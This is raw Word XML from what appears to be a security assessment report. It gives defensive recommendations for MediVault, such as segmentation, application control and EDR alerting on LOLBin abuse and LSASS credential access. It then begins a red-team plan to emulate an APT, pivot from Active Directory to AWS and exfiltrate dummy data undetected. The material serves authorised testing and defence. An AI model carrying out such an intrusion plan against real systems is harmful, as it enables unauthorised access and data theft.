        <w:t>MediVault's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC4F81">
        <w:t xml:space="preserve"> security posture from reactive to proactive and resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A409B29" w14:textId="77777777" w:rsidR="00EC4F81" w:rsidRPr="00B34A71" w:rsidRDefault="00EC4F81" w:rsidP="00B34A71">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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96"/>
        <w:gridCol w:w="2722"/>
        <w:gridCol w:w="4452"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B34A71" w:rsidRPr="00B34A71" w14:paraId="6AB6610B" w14:textId="77777777" w:rsidTr="00B34A71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B8D4231" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34A71">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Recommendation Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55314AE2" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34A71">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Strategic Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F12AE52" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B34A71">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Technical Control / Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34A71" w:rsidRPr="00B34A71" w14:paraId="4A168BAB" w14:textId="77777777" w:rsidTr="00B34A71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71B5DA5B" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B570CD" w:rsidRDefault="00B34A71" w:rsidP="00B570CD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Prevention (Architectural)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6886BC75" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve">Implement a </w:t>
            </w:r>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Zero Trust Architecture (ZTA),</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> specifically focusing on micro-segmentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F8C7D2" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Control:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve">Deploy NAC/SDP solutions to strictly enforce access based on "never trust, always verify." Segment the Research V-LAN from the Admin/HR V-LANs to block T1021 (RDP) pivots. Furthermore, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">implement GPO enforcement of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> or Windows Defender Application Control (WDAC)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> to block </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34A71">
              <w:t>LOLBin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> execution (T1218.011, T1059.003).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34A71" w:rsidRPr="00B34A71" w14:paraId="7A3ED8A9" w14:textId="77777777" w:rsidTr="00B34A71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DF90ACB" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B570CD" w:rsidRDefault="00B34A71" w:rsidP="00B570CD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Detection (Operational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="361FE843" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00B34A71">
              <w:t>Establish Threat Hunting Capabilities focused on the MITRE ATT&amp;CK TTPs identified, integrating the Cloud.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="011E1601" w14:textId="380A50DB" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Control:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve">Configure Endpoint Detection and Response (EDR) to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D07609">
              <w:t>prioritise</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> alerting on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>LOLBin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> execution</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> chains (T1218/T1059) and </w:t>
            </w:r>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>LSASS access attempts</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> (T1003) rather than just known malware hashes. Integrate </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B34A71">
              <w:t>CloudTrail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> and VPC Flow Logs into the SIEM for full hybrid visibility.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34A71" w:rsidRPr="00B34A71" w14:paraId="52656456" w14:textId="77777777" w:rsidTr="00B34A71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="580AC35B" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B570CD" w:rsidRDefault="00B34A71" w:rsidP="00B570CD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Process (Risk Management)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FF55818" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00B34A71">
              <w:t>Mandate and enforce a comprehensive Privileged Access Management (PAM) solution across all critical systems, including cloud infrastructure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="724168FB" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Control:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve">Implement tools that automatically rotate and vault credentials, enforce MFA for all administrative logon events, and monitor the usage of privileged accounts in real-time. Crucially, enforce </w:t>
            </w:r>
            <w:r w:rsidRPr="00593DB4">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>AWS IAM Role assumption</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> instead of static access keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34A71" w:rsidRPr="00B34A71" w14:paraId="7D4772A1" w14:textId="77777777" w:rsidTr="00B34A71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16C71A86" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00B570CD" w:rsidRDefault="00B34A71" w:rsidP="00B570CD">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B570CD">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Resilience (Cloud/Hybrid)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F515401" w14:textId="128783EB" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00D07609" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Standardise</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B34A71" w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> Configuration Management and Drift Detection across hybrid infrastructure using automated tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E109597" w14:textId="1E882C13" w:rsidR="00B34A71" w:rsidRPr="00B34A71" w:rsidRDefault="00B34A71" w:rsidP="00B34A71">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00593DB4">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Control:</w:t>
            </w:r>
            <w:r w:rsidRPr="00593DB4">
              <w:rPr>
                <w:color w:val="002060"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D07609">
              <w:t>Utilise</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00593DB4">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Cloud Security Posture Management (CSPM)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34A71">
              <w:t xml:space="preserve"> tools for AWS and Group Policy Objects (GPOs) for Active Directory to prevent configuration drift that creates vulnerabilities (e.g., misconfigured logging, outdated server applications). Enforce the deletion of static credentials older than 90 days.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39059435" w14:textId="77777777" w:rsidR="00B34A71" w:rsidRPr="00133237" w:rsidRDefault="00B34A71" w:rsidP="00133237">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECAB9B9" w14:textId="77777777" w:rsidR="00A7467C" w:rsidRDefault="00A7467C" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc215571131"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="261389B3" w14:textId="09FCB57A" w:rsidR="00291023" w:rsidRPr="00291023" w:rsidRDefault="00291023" w:rsidP="00A7467C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc215571132"/>
      <w:r w:rsidRPr="00291023">
        <w:t>Red Team Engagement: "Operation IP Shield"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="569666B3" w14:textId="77777777" w:rsidR="00291023" w:rsidRDefault="00291023" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00291023">
        <w:t xml:space="preserve">The objective is to emulate a sophisticated APT (e.g., APT 41 variant) to gain persistence in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291023">
        <w:t>Cureton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291023">
        <w:t xml:space="preserve"> Pharmaceutical Company's (CPC) hybrid environment, pivot from on-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291023">
        <w:t>prem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291023">
        <w:t xml:space="preserve"> Active Directory (AD) to the AWS cloud infrastructure, and successfully </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291023">
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291023">
        <w:t xml:space="preserve"> a simulated set of dummy research data without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EED697" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00291023">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAB3877" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00384BDB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc215571133"/>
      <w:r w:rsidRPr="00B736C5">
        <w:t>Campaign Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="289D1D11" w14:textId="0CE93D3D" w:rsidR="00141FDA" w:rsidRDefault="00A7467C" w:rsidP="00A7467C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ADF183C" wp14:editId="0BB1B627">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5936776" cy="5008729"/>
                <wp:effectExtent l="0" t="0" r="26035" b="1905"/>
                <wp:wrapNone/>
                <wp:docPr id="53" name="Group 53"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5936776" cy="5008729"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5481912" cy="3466305"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="52" name="Text Box 52"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1828800" y="3191985"/>
                            <a:ext cx="1737360"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04D61A" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="000125BF" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                              <w:pPr>
                                <w:rPr>
                                  <w:color w:val="7030A0"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="7030A0"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>Lessons Learned/ Next Scope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51" name="Group 51"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5481912" cy="3465394"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5481912" cy="3465394"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <wps:wsp>
                          <wps:cNvPr id="50" name="Text Box 50"/>
                          <wps:cNvSpPr txBox="1"/>
                          <wps:spPr>
                            <a:xfrm rot="16200000">
                              <a:off x="1694165" y="1974655"/>
                              <a:ext cx="1463040"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96586B" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="000125BF" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                                <w:pPr>
                                  <w:rPr>
                                    <w:color w:val="7030A0"/>
                                    <w:sz w:val="20"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="000125BF">
                                  <w:rPr>
                                    <w:color w:val="7030A0"/>
                                    <w:sz w:val="20"/>
                                  </w:rPr>
                                  <w:t>Move to Active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49" name="Group 49"/>
                          <wpg:cNvGrpSpPr/>
                          <wpg:grpSpPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="5481912" cy="3465394"/>
                              <a:chOff x="0" y="0"/>
                              <a:chExt cx="5481912" cy="3465394"/>
                            </a:xfrm>
                          </wpg:grpSpPr>
                          <wps:wsp>
                            <wps:cNvPr id="10" name="Rounded Rectangle 10"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1552575" cy="548640"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 34028"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="accent1">
                                  <a:lumMod val="20000"/>
                                  <a:lumOff val="80000"/>
                                </a:schemeClr>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CAEAD1" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r w:rsidRPr="00244A04">
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve">1. Pre-engagement </w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00244A04">
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:br/>
                                    <w:t xml:space="preserve">(Scope, </w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellStart"/>
                                  <w:r w:rsidRPr="00244A04">
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t>RoE</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t>, Contract</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00244A04">
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz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Rounded Rectangle 15"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="835862"/>
                                <a:ext cx="2011680" cy="548640"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 34028"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="accent1">
                                  <a:lumMod val="20000"/>
                                  <a:lumOff val="80000"/>
                                </a:schemeClr>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9F4DFB" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve">2. Intelligence Gathering </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:br/>
                                    <w:t>(Foot printing, Reconnaissance)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Rounded Rectangle 16"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="1716603"/>
                                <a:ext cx="2011680" cy="548640"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 34028"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="accent1">
                                  <a:lumMod val="20000"/>
                                  <a:lumOff val="80000"/>
                                </a:schemeClr>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7F9258" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve">3. Threat Modeling </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:br/>
                                    <w:t>(STRIDE, DREAD, Risk Rating)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Rounded Rectangle 17"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="2591735"/>
                                <a:ext cx="1737360" cy="548640"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 34028"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="accent1">
                                  <a:lumMod val="20000"/>
                                  <a:lumOff val="80000"/>
                                </a:schemeClr>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1DEC9E" w14:textId="77777777" w:rsidR="00701604" w:rsidRPr="00244A04" w:rsidRDefault="00701604" w:rsidP="00A7467C">
                                  <w:pPr>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:t xml:space="preserve">4. Vulnerability Analysis </w:t>
                                  </w:r>
                                  <w:r>
                                    <w:rPr>
                                      <w:color w:val="7030A0"/>
                                      <w:sz w:val="20"/>
                                    </w:rPr>
                                    <w:br/>
                                    <w:t>(Scanning, Manual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Rounded Rectangle 27"/>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
